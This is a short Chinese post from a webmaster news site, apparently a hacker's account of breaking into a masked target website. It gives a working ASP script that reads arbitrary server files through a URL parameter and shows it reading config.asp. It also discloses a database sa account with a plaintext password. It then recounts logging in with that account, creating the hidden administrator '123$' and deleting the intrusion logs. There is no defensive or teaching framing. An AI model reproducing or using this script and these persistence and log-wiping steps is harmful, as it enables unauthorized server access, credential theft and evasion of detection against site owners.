攻击目标:www.***.com 测试过的动作,一句话马,加密马,等。 测试结果:无效,无法上传,无法进入系统。 经过2天的分析, 然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 ------------------------------------------------------------------------- <% file=Request("file") Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject") if FSOOBJ.fileExists(file) then Set myfile=FSOOBJ.opentextfile(file,1) Response.write " " & server.HTMLEncode(myfile.readall) &"" myfile.close Set myfile=nothing else Response.write "file(" & file & ") not exists." end if %> ------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:\wwwroot\index.asp 读取到的敏感内容 sql地址:***.***.***.*** 帐号:sa 密码:u8f2444f 利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。 |
免责声明:本站部分文章和图片均来自用户投稿和网络收集,旨在传播知识,文章和图片版权归原作者及原出处所有,仅供学习与参考,请勿用于商业用途,如果损害了您的权利,请联系我们及时修正或删除。谢谢!
始终以前瞻性的眼光聚焦站长、创业、互联网等领域,为您提供最新最全的互联网资讯,帮助站长转型升级,为互联网创业者提供更加优质的创业信息和品牌营销服务,与站长一起进步!让互联网创业者不再孤独!
扫一扫,关注站长网微信